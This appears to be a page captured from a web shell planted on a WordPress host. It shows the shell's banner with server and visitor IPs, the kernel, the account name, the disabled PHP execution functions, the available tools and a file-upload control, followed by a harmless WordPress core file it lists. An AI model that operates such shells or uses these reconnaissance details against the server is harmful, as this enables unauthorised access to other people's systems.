| Server IP : 185.130.50.40 / Your IP : 216.73.216.38 Web Server : LiteSpeed System : Linux oxygen.shetabanhost.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64 User : taktablo ( 1439) PHP Version : 7.4.33 Disable Function : symlink,shell_exec,show_source,exec,popen,system,passthru,proc_open,proc_close,pcntl_exec,mail MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taktablo/public_html/wp-includes/ |
Upload File : |
<?php /** * Polyfill for SPL autoload feature. This file is separate to prevent compiler notices * on the deprecated __autoload() function. * * See https://core.trac.wordpress.org/ticket/41134 * * @deprecated 5.3.0 No longer needed as the minimum PHP requirement has moved beyond PHP 5.3. * * @package PHP * @access private */ _deprecated_file( basename( __FILE__ ), '5.3.0', '', 'SPL can no longer be disabled as of PHP 5.3.' );